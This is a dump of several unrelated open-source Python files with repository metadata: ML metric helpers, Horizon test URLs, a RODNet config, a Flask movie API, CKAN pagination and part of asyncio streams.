return 1.0 * np.sum(y_true == y_pred) / len(y_true)
def f1_pb(y_true, y_proba):
y_true = y_true.reshape(-1)
y_pred = np.argmax(y_proba.reshape((-1, y_proba.shape[-1])), 1)
return f1_score(y_true, y_pred, average="weighted")
def accuracy_win_vote(y_true, y_proba):
"""
Parameters
----------
y_true: n x n_windows
y_proba: n x n_windows x n_classes
"""
n_classes = y_proba.shape[-1]
y_pred = win_vote(np.argmax(y_proba, axis=2), n_classes)
return accuracy(y_true[:,0], y_pred)
def accuracy_win_avg(y_true, y_proba):
"""
Parameters
----------
y_true: n x n_windows
y_proba: n x n_windows x n_classes
"""
y_pred = win_avg(y_proba)
return accuracy(y_true[:,0], y_pred)
| 24.644444 | 67 | 0.641118 |
79552c9460acce1a8fabe24a555e1baf2d55ddbf | 1,854 | py | Python | openstack_dashboard/test/urls.py | enovance/horizon | 2ed6e93c9c4e534883126c93d3283e8c93bc674f | [
"Apache-2.0"
] | 3 | 2015-04-24T22:39:12.000Z | 2021-03-29T15:38:53.000Z | openstack_dashboard/test/urls.py | enovance/horizon | 2ed6e93c9c4e534883126c93d3283e8c93bc674f | [
"Apache-2.0"
] | 1 | 2021-03-21T11:48:09.000Z | 2021-03-21T11:48:09.000Z | openstack_dashboard/test/urls.py | enovance/horizon | 2ed6e93c9c4e534883126c93d3283e8c93bc674f | [
"Apache-2.0"
] | 15 | 2017-01-12T10:40:00.000Z | 2019-04-19T08:28:05.000Z | #
# (c) Copyright 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
URL patterns for the OpenStack Dashboard.
"""
from django.conf import settings
from django.conf.urls import include
from django.conf.urls import patterns
from django.conf.urls.static import static # noqa
from django.conf.urls import url
from django.contrib.staticfiles.urls import staticfiles_urlpatterns # noqa
from openstack_dashboard.test.jasmine import jasmine
import horizon
urlpatterns = patterns(
'',
url(r'^$', 'openstack_dashboard.views.splash', name='splash'),
url(r'^auth/', include('openstack_auth.urls')),
url(r'^api/', include('openstack_dashboard.api.rest.urls')),
url(r'^jasmine/(.*?)$', jasmine.dispatcher),
url(r'', include(horizon.urls)),
)
# Development static app and project media serving using the staticfiles app.
urlpatterns += staticfiles_urlpatterns()
# Convenience function for serving user-uploaded media during
# development. Only active if DEBUG==True and the URL prefix is a local
# path. Production media should NOT be served by Django.
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
if settings.DEBUG:
urlpatterns += patterns(
'',
url(r'^500/$', 'django.views.defaults.server_error')
)
| 34.981132 | 78 | 0.73247 |
79552d6b7be55db40f99839650fc6e0d26f4a57c | 1,189 | py | Python | configs/past/config_rodnet_gsc_win16.py | zhengzangw/RODNet | eca5f2bd1f3051c2b823d279532ddafa71b009c1 | [
"MIT"
] | null | null | null | configs/past/config_rodnet_gsc_win16.py | zhengzangw/RODNet | eca5f2bd1f3051c2b823d279532ddafa71b009c1 | [
"MIT"
] | null | null | null | configs/past/config_rodnet_gsc_win16.py | zhengzangw/RODNet | eca5f2bd1f3051c2b823d279532ddafa71b009c1 | [
"MIT"
] | null | null | null | dataset_cfg = dict(
dataset_name="rod2021_valid",
base_root="./rod2021_valid",
data_root="./rod2021_valid/sequences",
anno_root="./rod2021_valid/annotations",
anno_ext=".txt",
train=dict(subdir="train",),
valid=dict(subdir="valid", seqs=[],),
test=dict(subdir="test",),
demo=dict(subdir="demo", seqs=[],),
)
model_cfg = dict(
type="GSC",
name="rodnet-gsc-win16",
max_dets=20,
peak_thres=0.4,
ols_thres=0.3,
stacked_num=1,
)
confmap_cfg = dict(
confmap_sigmas={"pedestrian": 15, "cyclist": 20, "car": 30,},
confmap_sigmas_interval={
"pedestrian": [5, 15],
"cyclist": [8, 20],
"car": [10, 30],
},
confmap_length={"pedestrian": 1, "cyclist": 2, "car": 3,},
)
train_cfg = dict(
n_epoch=30,
batch_size=32,
lr=0.0001,
lr_step=10, # lr will decrease 10 times after lr_step epoches
win_size=16,
train_step=1,
train_stride=4,
log_step=100,
save_step=10000,
)
test_cfg = dict(
test_step=1,
test_stride=8,
rr_min=1.0, # min radar range
rr_max=20.0, # max radar range
ra_min=-60.0, # min radar angle
ra_max=60.0, # max radar angle
)
| 23.313725 | 66 | 0.60471 |
79553033b9ba384440e98146a2a03a59854c8f95 | 924 | py | Python | src/users/app.py | MitraThakker/MyMDB | f812f9005b64f0644ff0829211e098a115bf1584 | [
"MIT"
] | null | null | null | src/users/app.py | MitraThakker/MyMDB | f812f9005b64f0644ff0829211e098a115bf1584 | [
"MIT"
] | null | null | null | src/users/app.py | MitraThakker/MyMDB | f812f9005b64f0644ff0829211e098a115bf1584 | [
"MIT"
] | null | null | null | from flask import Flask, jsonify, request
from src.users import svc as user_svc
app = Flask('user')
@app.route('/', methods=['GET'])
def index():
return "Hello, world!"
@app.route('/movies', methods=['GET'])
def list_all_movies():
result = user_svc.list_all_movies()
if result is not None:
return jsonify(result), 200
return "error", 500
@app.route('/movie/<int:movie_id>', methods=['GET'])
def movie_details(movie_id: int):
result = user_svc.movie_details(movie_id)
if result is not None:
return jsonify(result), 200
return "error", 500
@app.route('/movie/search', methods=['GET'])
def search_movie():
search_string = request.args.get('query', '')
result = user_svc.search_movie(search_string)
if result is not None:
return jsonify(result), 200
return "error", 500
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0', port=5002)
| 23.1 | 52 | 0.659091 |
795530cde74ebd9b1cb552c5d24590d84973a777 | 25,198 | py | Python | ckan/lib/pagination.py | JGulic/ckan | fe604ba20b63ce4802c108ce20e26e742b2905c8 | [
"Apache-2.0"
] | 1 | 2020-01-16T10:46:18.000Z | 2020-01-16T10:46:18.000Z | ckan/lib/pagination.py | JGulic/ckan | fe604ba20b63ce4802c108ce20e26e742b2905c8 | [
"Apache-2.0"
] | null | null | null | ckan/lib/pagination.py | JGulic/ckan | fe604ba20b63ce4802c108ce20e26e742b2905c8 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
u'''
This module was copied (with modifications) from the webhelpers library,
which is distributed with the following license:
Copyright (c) 2005-2009 Ben Bangert, James Gardner, Philip Jenvey,
Mike Orr, Jon Rosenbaugh, Christoph Haas,
and other contributors.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author or contributors may not be used to endorse or
promote products derived from this software without specific prior
written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
'''
import re
from string import Template
import dominate.tags as tags
from markupsafe import Markup
from six import text_type
from six.moves import range
class BasePage(list):
"""A list/iterator of items representing one page in a larger
collection.
An instance of the "Page" class is created from a collection of things.
The instance works as an iterator running from the first item to the
last item on the given page. The collection can be:
- a sequence
- an SQLAlchemy query - e.g.: Session.query(MyModel)
- an SQLAlchemy select - e.g.: sqlalchemy.select([my_table])
A "Page" instance maintains pagination logic associated with each
page, where it begins, what the first/last item on the page is, etc.
The pager() method creates a link list allowing the user to go to
other pages.
**WARNING:** Unless you pass in an item_count, a count will be
performed on the collection every time a Page instance is created.
If using an ORM, it's advised to pass in the number of items in the
collection if that number is known.
Instance attributes:
original_collection
Points to the collection object being paged through
item_count
Number of items in the collection
page
Number of the current page
items_per_page
Maximal number of items displayed on a page
first_page
Number of the first page - starts with 1
last_page
Number of the last page
page_count
Number of pages
items
Sequence/iterator of items on the current page
first_item
Index of first item on the current page - starts with 1
last_item
Index of last item on the current page
"""
def __init__(
self,
collection,
page=1,
items_per_page=20,
item_count=None,
sqlalchemy_session=None,
presliced_list=False,
url=None,
**kwargs
):
"""Create a "Page" instance.
Parameters:
collection
Sequence, SQLAlchemy select object or SQLAlchemy ORM-query
representing the collection of items to page through.
page
The requested page number - starts with 1. Default: 1.
items_per_page
The maximal number of items to be displayed per page.
Default: 20.
item_count (optional)
The total number of items in the collection - if known.
If this parameter is not given then the paginator will count
the number of elements in the collection every time a "Page"
is created. Giving this parameter will speed up things.
presliced_list (optional)
Indicates whether the collection, when a list, has already
been sliced for the current viewing page, and thus should
*not* be sliced again.
sqlalchemy_session (optional)
If you want to use an SQLAlchemy (0.4) select object as a
collection then you need to provide an SQLAlchemy session object.
Select objects do not have a database connection attached so it
would not be able to execute the SELECT query.
url (optional)
A URL generator function. See module docstring for details.
This is used only by ``.pager()``.
Further keyword arguments are used as link arguments in the pager().
"""
self._url_generator = url
# Safe the kwargs class-wide so they can be used in the pager() method
self.kwargs = kwargs
# Save a reference to the collection
self.original_collection = collection
self.collection = collection
# The self.page is the number of the current page.
# The first page has the number 1!
try:
self.page = int(page) # make it int() if we get it as a string
except (ValueError, TypeError):
self.page = 1
self.items_per_page = items_per_page
# Unless the user tells us how many items the collections has
# we calculate that ourselves.
if item_count is not None:
self.item_count = item_count
else:
self.item_count = len(self.collection)
# Compute the number of the first and last available page
if self.item_count > 0:
self.first_page = 1
self.page_count = int(
((self.item_count - 1) / self.items_per_page) + 1)
self.last_page = self.first_page + self.page_count - 1
# Make sure that the requested page number is the range of
# valid pages
if self.page > self.last_page:
self.page = self.last_page
elif self.page < self.first_page:
self.page = self.first_page
# Note: the number of items on this page can be less than
# items_per_page if the last page is not full
self.first_item = (self.page - 1) * items_per_page + 1
self.last_item = min(
self.first_item + items_per_page - 1, self.item_count
)
# We subclassed "list" so we need to call its init() method
# and fill the new list with the items to be displayed on the page.
# We use list() so that the items on the current page are retrieved
# only once. Otherwise it would run the actual SQL query everytime
# .items would be accessed.
if presliced_list:
self.items = self.collection
else:
first = self.first_item - 1
last = self.last_item
self.items = list(self.collection[first:last])
# Links to previous and next page
if self.page > self.first_page:
self.previous_page = self.page - 1
else:
self.previous_page = None
if self.page < self.last_page:
self.next_page = self.page + 1
else:
self.next_page = None
# No items available
else:
self.first_page = None
self.page_count = 0
self.last_page = None
self.first_item = None
self.last_item = None
self.previous_page = None
self.next_page = None
self.items = []
# This is a subclass of the 'list' type. Initialise the list now.
list.__init__(self, self.items)
def __repr__(self):
return (
u"Page:\n"
u"Collection type: %(type)s\n"
u"(Current) page: %(page)s\n"
u"First item: %(first_item)s\n"
u"Last item: %(last_item)s\n"
u"First page: %(first_page)s\n"
u"Last page: %(last_page)s\n"
u"Previous page: %(previous_page)s\n"
u"Next page: %(next_page)s\n"
u"Items per page: %(items_per_page)s\n"
u"Number of items: %(item_count)s\n"
u"Number of pages: %(page_count)s\n"
% {
u"type": type(self.collection),
u"page": self.page,
u"first_item": self.first_item,
u"last_item": self.last_item,
u"first_page": self.first_page,
u"last_page": self.last_page,
u"previous_page": self.previous_page,
u"next_page": self.next_page,
u"items_per_page": self.items_per_page,
u"item_count": self.item_count,
u"page_count": self.page_count,
}
)
def pager(
self,
format=u"~2~",
page_param=u"page",
partial_param=u"partial",
show_if_single_page=False,
separator=u" ",
onclick=None,
symbol_first=u"<<",
symbol_last=u">>",
symbol_previous=u"<",
symbol_next=u">",
link_attr={u"class": u"pager_link"},
curpage_attr={u"class": u"pager_curpage"},
dotdot_attr={u"class": u"pager_dotdot"},
**kwargs
):
"""Return string with links to other pages (e.g. "1 2 [3] 4 5 6 7").
format:
Format string that defines how the pager is rendered. The string
can contain the following $-tokens that are substituted by the
string.Template module:
- $first_page: number of first reachable page
- $last_page: number of last reachable page
- $page: number of currently selected page
- $page_count: number of reachable pages
- $items_per_page: maximal number of items per page
- $first_item: index of first item on the current page
- $last_item: index of last item on the current page
- $item_count: total number of items
- $link_first: link to first page (unless this is first page)
- $link_last: link to last page (unless this is last page)
- $link_previous: link to previous page (unless this is first page)
- $link_next: link to next page (unless this is last page)
To render a range of pages the token '~3~' can be used. The
number sets the radius of pages around the current page.
Example for a range with radius 3:
'1 .. 5 6 7 [8] 9 10 11 .. 500'
Default: '~2~'
symbol_first
String to be displayed as the text for the %(link_first)s
link above.
Default: '<<'
symbol_last
String to be displayed as the text for the %(link_last)s
link above.
Default: '>>'
symbol_previous
String to be displayed as the text for the %(link_previous)s
link above.
Default: '<'
symbol_next
String to be displayed as the text for the %(link_next)s
link above.
Default: '>'
separator:
String that is used to separate page links/numbers in the
above range of pages.
Default: ' '
page_param:
The name of the parameter that will carry the number of the
page the user just clicked on. The parameter will be passed
to a url_for() call so if you stay with the default
':controller/:action/:id' routing and set page_param='id' then
the :id part of the URL will be changed. If you set
page_param='page' then url_for() will make it an extra
parameters like ':controller/:action/:id?page=1'.
You need the page_param in your action to determine the page
number the user wants to see. If you do not specify anything
else the default will be a parameter called 'page'.
Note: If you set this argument and are using a URL generator
callback, the callback must accept this name as an argument instead
of 'page'.
callback, becaust the callback requires its argument to be 'page'.
Instead the callback itself can return any URL necessary.
partial_param:
When using AJAX/AJAH to do partial updates of the page area the
application has to know whether a partial update (only the
area to be replaced) or a full update (reloading the whole
page) is required. So this parameter is the name of the URL
parameter that gets set to 1 if the 'onclick' parameter is
used. So if the user requests a new page through a Javascript
action (onclick) then this parameter gets set and the application
is supposed to return a partial content. And without
Javascript this parameter is not set. The application thus has
to check for the existence of this parameter to determine
whether only a partial or a full page needs to be returned.
See also the examples in this modules docstring.
Default: 'partial'
Note: If you set this argument and are using a URL generator
callback, the callback must accept this name as an argument instead
of 'partial'.
show_if_single_page:
if True the navigator will be shown even if there is only
one page
Default: False
link_attr (optional)
A dictionary of attributes that get added to A-HREF links
pointing to other pages. Can be used to define a CSS style
or class to customize the look of links.
Example: { 'style':'border: 1px solid green' }
Default: { 'class':'pager_link' }
curpage_attr (optional)
A dictionary of attributes that get added to the current
page number in the pager (which is obviously not a link).
If this dictionary is not empty then the elements
will be wrapped in a SPAN tag with the given attributes.
Example: { 'style':'border: 3px solid blue' }
Default: { 'class':'pager_curpage' }
dotdot_attr (optional)
A dictionary of attributes that get added to the '..' string
in the pager (which is obviously not a link). If this
dictionary is not empty then the elements will be wrapped in
a SPAN tag with the given attributes.
Example: { 'style':'color: #808080' }
Default: { 'class':'pager_dotdot' }
onclick (optional)
This paramter is a string containing optional Javascript
code that will be used as the 'onclick' action of each
pager link. It can be used to enhance your pager with
AJAX actions loading another page into a DOM object.
In this string the variable '$partial_url' will be replaced by
the URL linking to the desired page with an added 'partial=1'
parameter (or whatever you set 'partial_param' to).
In addition the '$page' variable gets replaced by the
respective page number.
Note that the URL to the destination page contains a
'partial_param' parameter so that you can distinguish
between AJAX requests (just refreshing the paginated area
of your page) and full requests (loading the whole new
page).
[Backward compatibility: you can use '%s' instead of
'$partial_url']
jQuery example:
"$('#my-page-area').load('$partial_url'); return false;"
Yahoo UI example:
"YAHOO.util.Connect.asyncRequest('GET','$partial_url',{
success:function(o){
YAHOO.util.Dom.get(
'#my-page-area'
).innerHTML=o.responseText;
}
},null); return false;"
scriptaculous example:
"new Ajax.Updater('#my-page-area', '$partial_url',
{asynchronous:true, evalScripts:true}); return false;"
ExtJS example:
"Ext.get('#my-page-area').load({url:'$partial_url'});
return false;"
Custom example:
"my_load_page($page)"
Additional keyword arguments are used as arguments in the links.
Otherwise the link will be created with url_for() which points
to the page you are currently displaying.
"""
self.curpage_attr = curpage_attr
self.separator = separator
self.pager_kwargs = kwargs
self.page_param = page_param
self.partial_param = partial_param
self.onclick = onclick
self.link_attr = link_attr
self.dotdot_attr = dotdot_attr
# Don't show navigator if there is no more than one page
if self.page_count == 0 or (
self.page_count == 1 and not show_if_single_page
):
return u""
# Replace ~...~ in token format by range of pages
result = re.sub(u"~(\\d+)~", self._range, format)
# Interpolate '%' variables
result = Template(result).safe_substitute(
{
u"first_page": self.first_page,
u"last_page": self.last_page,
u"page": self.page,
u"page_count": self.page_count,
u"items_per_page": self.items_per_page,
u"first_item": self.first_item,
u"last_item": self.last_item,
u"item_count": self.item_count,
u"link_first": self.page > self.first_page
and self._pagerlink(self.first_page, symbol_first)
or u"",
u"link_last": self.page < self.last_page
and self._pagerlink(self.last_page, symbol_last)
or u"",
u"link_previous": self.previous_page
and self._pagerlink(self.previous_page, symbol_previous)
or u"",
u"link_next": self.next_page
and self._pagerlink(self.next_page, symbol_next)
or u"",
}
)
return Markup(result)
# Private methods
def _range(self, regexp_match):
"""
Return range of linked pages (e.g. '1 2 [3] 4 5 6 7 8').
Arguments:
regexp_match
A "re" (regular expressions) match object containing the
radius of linked pages around the current page in
regexp_match.group(1) as a string
This function is supposed to be called as a callable in
re.sub.
"""
radius = int(regexp_match.group(1))
# Compute the first and last page number within the radius
# e.g. '1 .. 5 6 [7] 8 9 .. 12'
# -> leftmost_page = 5
# -> rightmost_page = 9
leftmost_page = max(self.first_page, (self.page - radius))
rightmost_page = min(self.last_page, (self.page + radius))
nav_items = []
# Create a link to the first page (unless we are on the first page
# or there would be no need to insert '..' spacers)
if self.page != self.first_page and self.first_page < leftmost_page:
nav_items.append(self._pagerlink(self.first_page, self.first_page))
# Insert dots if there are pages between the first page
# and the currently displayed page range
if leftmost_page - self.first_page > 1:
# Wrap in a SPAN tag if nolink_attr is set
text = u".."
if self.dotdot_attr:
text = Markup(tags.span(text, **self.dotdot_attr))
nav_items.append(text)
for thispage in range(leftmost_page, rightmost_page + 1):
# Hilight the current page number and do not use a link
if thispage == self.page:
text = u"%s" % (thispage,)
# Wrap in a SPAN tag if nolink_attr is set
if self.curpage_attr:
text = Markup(tags.span(text, **self.curpage_attr))
nav_items.append(text)
# Otherwise create just a link to that page
else:
text = u"%s" % (thispage,)
nav_items.append(self._pagerlink(thispage, text))
# Insert dots if there are pages between the displayed
# page numbers and the end of the page range
if self.last_page - rightmost_page > 1:
text = u".."
# Wrap in a SPAN tag if nolink_attr is set
if self.dotdot_attr:
text = Markup(tags.span(text, **self.dotdot_attr))
nav_items.append(text)
# Create a link to the very last page (unless we are on the last
# page or there would be no need to insert '..' spacers)
if self.page != self.last_page and rightmost_page < self.last_page:
nav_items.append(self._pagerlink(self.last_page, self.last_page))
return self.separator.join(nav_items)
def _pagerlink(self, page, text):
"""
Create a URL that links to another page using url_for().
Parameters:
page
Number of the page that the link points to
text
Text to be printed in the A-HREF tag
"""
link_params = {}
# Use the instance kwargs from Page.__init__ as URL parameters
link_params.update(self.kwargs)
# Add keyword arguments from pager() to the link as parameters
link_params.update(self.pager_kwargs)
link_params[self.page_param] = page
# Get the URL generator
if self._url_generator is not None:
url_generator = self._url_generator
else:
from ckan.lib.helpers import pager_url
# Create the URL to load a certain page
link_url = url_generator(**link_params)
if self.onclick: # create link with onclick action for AJAX
# Create the URL to load the page area part of a certain page (AJAX
# updates)
link_params[self.partial_param] = 1
partial_url = url_generator(**link_params)
try:
# if '%s' is used in the 'onclick' parameter
# (backwards compatibility)
onclick_action = self.onclick % (partial_url,)
except TypeError:
onclick_action = Template(self.onclick).safe_substitute(
{u"partial_url": partial_url, u"page": page}
)
return tags.a(
text, href=link_url, onclick=onclick_action, **self.link_attr
)
else: # return static link
return tags.a(text, href=link_url, **self.link_attr)
class Page(BasePage):
def pager(self, *args, **kwargs):
with tags.div(cls=u"pagination-wrapper") as wrapper:
tags.ul(u"$link_previous ~2~ $link_next", cls=u"pagination")
kwargs.update(
format=text_type(wrapper),
symbol_previous=u"«",
symbol_next=u"»",
curpage_attr={u"class": u"active"},
link_attr={},
)
return super(Page, self).pager(*args, **kwargs)
# Put each page link into a <li> (for Bootstrap to style it)
def _pagerlink(self, page, text, extra_attributes=None):
anchor = super(Page, self)._pagerlink(page, text)
extra_attributes = extra_attributes or {}
return text_type(tags.li(anchor, **extra_attributes))
# Change 'current page' link from <span> to <li><a>
# and '..' into '<li><a>..'
# (for Bootstrap to style them properly)
def _range(self, regexp_match):
html = super(Page, self)._range(regexp_match)
# Convert ..
dotdot = u'<span class="pager_dotdot">..</span>'
dotdot_link = tags.li(tags.a(u"...", href=u"#"), cls=u"disabled")
html = re.sub(dotdot, dotdot_link, html)
# Convert current page
text = u"%s" % self.page
current_page_span = text_type(tags.span(text, **self.curpage_attr))
current_page_link = self._pagerlink(
self.page, text, extra_attributes=self.curpage_attr
)
return re.sub(current_page_span, current_page_link, html)
| 38.063444 | 79 | 0.597111 |
795530e6f69efed66df8a91a383091f65e455a6a | 27,342 | py | Python | Lib/asyncio/streams.py | umoqnier/cpython | d8ca2354ed30c12b9ce37c4535222b700a727b32 | [
"CNRI-Python-GPL-Compatible"
] | 3 | 2020-09-23T14:09:49.000Z | 2021-06-23T07:48:04.000Z | Lib/asyncio/streams.py | umoqnier/cpython | d8ca2354ed30c12b9ce37c4535222b700a727b32 | [
"CNRI-Python-GPL-Compatible"
] | 2 | 2022-01-25T23:07:38.000Z | 2022-03-01T18:04:59.000Z | Lib/asyncio/streams.py | umoqnier/cpython | d8ca2354ed30c12b9ce37c4535222b700a727b32 | [
"CNRI-Python-GPL-Compatible"
] | 2 | 2019-11-16T02:03:51.000Z | 2019-11-16T02:10:57.000Z | __all__ = (
'StreamReader', 'StreamWriter', 'StreamReaderProtocol',
'open_connection', 'start_server')
import socket
import sys
import warnings
import weakref
if hasattr(socket, 'AF_UNIX'):
__all__ += ('open_unix_connection', 'start_unix_server')
from . import coroutines
from . import events
from . import exceptions
from . import format_helpers
from . import protocols
from .log import logger
from .tasks import sleep
_DEFAULT_LIMIT = 2 ** 16 # 64 KiB
async def open_connection(host=None, port=None, *,
loop=None, limit=_DEFAULT_LIMIT, **kwds):
"""A wrapper for create_connection() returning a (reader, writer) pair.
The reader returned is a StreamReader instance; the writer is a
StreamWriter instance.
The arguments are all the usual arguments to create_connection()
except protocol_factory; most common are positional host and port,
with various optional keyword arguments following.
Additional optional keyword arguments are loop (to set the event loop
instance to use) and limit (to set the buffer limit passed to the
StreamReader).
(If you want to customize the StreamReader and/or
StreamReaderProtocol classes, just copy the code -- there's
really nothing special here except some convenience.)
"""
if loop is None:
loop = events.get_event_loop()
else:
warnings.warn("The loop argument is deprecated since Python 3.8, "
"and scheduled for removal in Python 3.10.",
DeprecationWarning, stacklevel=2)
reader = StreamReader(limit=limit, loop=loop)
protocol = StreamReaderProtocol(reader, loop=loop)
transport, _ = await loop.create_connection(
lambda: protocol, host, port, **kwds)
writer = StreamWriter(transport, protocol, reader, loop)
return reader, writer
async def start_server(client_connected_cb, host=None, port=None, *,
loop=None, limit=_DEFAULT_LIMIT, **kwds):
"""Start a socket server, call back for each client connected.
The first parameter, `client_connected_cb`, takes two parameters:
client_reader, client_writer. client_reader is a StreamReader
object, while client_writer is a StreamWriter object. This
parameter can either be a plain callback function or a coroutine;
if it is a coroutine, it will be automatically converted into a
Task.
The rest of the arguments are all the usual arguments to
loop.create_server() except protocol_factory; most common are
positional host and port, with various optional keyword arguments
following. The return value is the same as loop.create_server().
Additional optional keyword arguments are loop (to set the event loop
instance to use) and limit (to set the buffer limit passed to the
StreamReader).
The return value is the same as loop.create_server(), i.e. a
Server object which can be used to stop the service.
"""
if loop is None:
loop = events.get_event_loop()
else:
warnings.warn("The loop argument is deprecated since Python 3.8, "
"and scheduled for removal in Python 3.10.",
DeprecationWarning, stacklevel=2)
def factory():
reader = StreamReader(limit=limit, loop=loop)
protocol = StreamReaderProtocol(reader, client_connected_cb,
loop=loop)
return protocol
return await loop.create_server(factory, host, port, **kwds)
if hasattr(socket, 'AF_UNIX'):
# UNIX Domain Sockets are supported on this platform
async def open_unix_connection(path=None, *,
loop=None, limit=_DEFAULT_LIMIT, **kwds):
"""Similar to `open_connection` but works with UNIX Domain Sockets."""
if loop is None:
loop = events.get_event_loop()
else:
warnings.warn("The loop argument is deprecated since Python 3.8, "
"and scheduled for removal in Python 3.10.",
DeprecationWarning, stacklevel=2)
reader = StreamReader(limit=limit, loop=loop)
protocol = StreamReaderProtocol(reader, loop=loop)
transport, _ = await loop.create_unix_connection(
lambda: protocol, path, **kwds)
writer = StreamWriter(transport, protocol, reader, loop)
return reader, writer
async def start_unix_server(client_connected_cb, path=None, *,
loop=None, limit=_DEFAULT_LIMIT, **kwds):
"""Similar to `start_server` but works with UNIX Domain Sockets."""
if loop is None:
loop = events.get_event_loop()
else:
warnings.warn("The loop argument is deprecated since Python 3.8, "
"and scheduled for removal in Python 3.10.",
DeprecationWarning, stacklevel=2)
def factory():
reader = StreamReader(limit=limit, loop=loop)
protocol = StreamReaderProtocol(reader, client_connected_cb,
loop=loop)
return protocol
return await loop.create_unix_server(factory, path, **kwds)
class FlowControlMixin(protocols.Protocol):
"""Reusable flow control logic for StreamWriter.drain().
This implements the protocol methods pause_writing(),
resume_writing() and connection_lost(). If the subclass overrides
these it must call the super methods.
StreamWriter.drain() must wait for _drain_helper() coroutine.
"""
def __init__(self, loop=None):
if loop is None:
self._loop = events.get_event_loop()
else:
self._loop = loop
self._paused = False
self._drain_waiter = None
self._connection_lost = False
def pause_writing(self):
assert not self._paused
self._paused = True
if self._loop.get_debug():
logger.debug("%r pauses writing", self)
def resume_writing(self):
assert self._paused
self._paused = False
if self._loop.get_debug():
logger.debug("%r resumes writing", self)
waiter = self._drain_waiter
if waiter is not None:
self._drain_waiter = None
if not waiter.done():
waiter.set_result(None)
def connection_lost(self, exc):
self._connection_lost = True
# Wake up the writer if currently paused.
if not self._paused:
return
waiter = self._drain_waiter
if waiter is None:
return
self._drain_waiter = None
if waiter.done():
return
if exc is None:
waiter.set_result(None)
else:
waiter.set_exception(exc)
async def _drain_helper(self):
if self._connection_lost:
raise ConnectionResetError('Connection lost')
if not self._paused:
return
waiter = self._drain_waiter
assert waiter is None or waiter.cancelled()
waiter = self._loop.create_future()
self._drain_waiter = waiter
await waiter
def _get_close_waiter(self, stream):
raise NotImplementedError
class StreamReaderProtocol(FlowControlMixin, protocols.Protocol):
"""Helper class to adapt between Protocol and StreamReader.
(This is a helper class instead of making StreamReader itself a
Protocol subclass, because the StreamReader has other potential
uses, and to prevent the user of the StreamReader to accidentally
call inappropriate methods of the protocol.)
"""
_source_traceback = None
def __init__(self, stream_reader, client_connected_cb=None, loop=None):
super().__init__(loop=loop)
if stream_reader is not None:
self._stream_reader_wr = weakref.ref(stream_reader,
self._on_reader_gc)
self._source_traceback = stream_reader._source_traceback
else:
self._stream_reader_wr = None
if client_connected_cb is not None:
# This is a stream created by the `create_server()` function.
# Keep a strong reference to the reader until a connection
# is established.
self._strong_reader = stream_reader
self._reject_connection = False
self._stream_writer = None
self._transport = None
self._client_connected_cb = client_connected_cb
self._over_ssl = False
self._closed = self._loop.create_future()
def _on_reader_gc(self, wr):
transport = self._transport
if transport is not None:
# connection_made was called
context = {
'message': ('An open stream object is being garbage '
'collected; call "stream.close()" explicitly.')
}
if self._source_traceback:
context['source_traceback'] = self._source_traceback
self._loop.call_exception_handler(context)
transport.abort()
else:
self._reject_connection = True
self._stream_reader_wr = None
@property
def _stream_reader(self):
if self._stream_reader_wr is None:
return None
return self._stream_reader_wr()
def connection_made(self, transport):
if self._reject_connection:
context = {
'message': ('An open stream was garbage collected prior to '
'establishing network connection; '
'call "stream.close()" explicitly.')
}
if self._source_traceback:
context['source_traceback'] = self._source_traceback
self._loop.call_exception_handler(context)
transport.abort()
return
self._transport = transport
reader = self._stream_reader
if reader is not None:
reader.set_transport(transport)
self._over_ssl = transport.get_extra_info('sslcontext') is not None
if self._client_connected_cb is not None:
self._stream_writer = StreamWriter(transport, self,
reader,
self._loop)
res = self._client_connected_cb(reader,
self._stream_writer)
if coroutines.iscoroutine(res):
self._loop.create_task(res)
self._strong_reader = None
def connection_lost(self, exc):
reader = self._stream_reader
if reader is not None:
if exc is None:
reader.feed_eof()
else:
reader.set_exception(exc)
if not self._closed.done():
if exc is None:
self._closed.set_result(None)
else:
self._closed.set_exception(exc)
super().connection_lost(exc)
self._stream_reader_wr = None
self._stream_writer = None
self._transport = None
def data_received(self, data):
reader = self._stream_reader
if reader is not None:
reader.feed_data(data)
def eof_received(self):
reader = self._stream_reader
if reader is not None:
reader.feed_eof()
if self._over_ssl:
# Prevent a warning in SSLProtocol.eof_received:
# "returning true from eof_received()
# has no effect when using ssl"
return False
return True
def _get_close_waiter(self, stream):
return self._closed
def __del__(self):
# Prevent reports about unhandled exceptions.
# Better than self._closed._log_traceback = False hack
closed = self._closed
if closed.done() and not closed.cancelled():
closed.exception()
class StreamWriter:
"""Wraps a Transport.
This exposes write(), writelines(), [can_]write_eof(),
get_extra_info() and close(). It adds drain() which returns an
optional Future on which you can wait for flow control. It also
adds a transport property which references the Transport
directly.
"""
def __init__(self, transport, protocol, reader, loop):
self._transport = transport
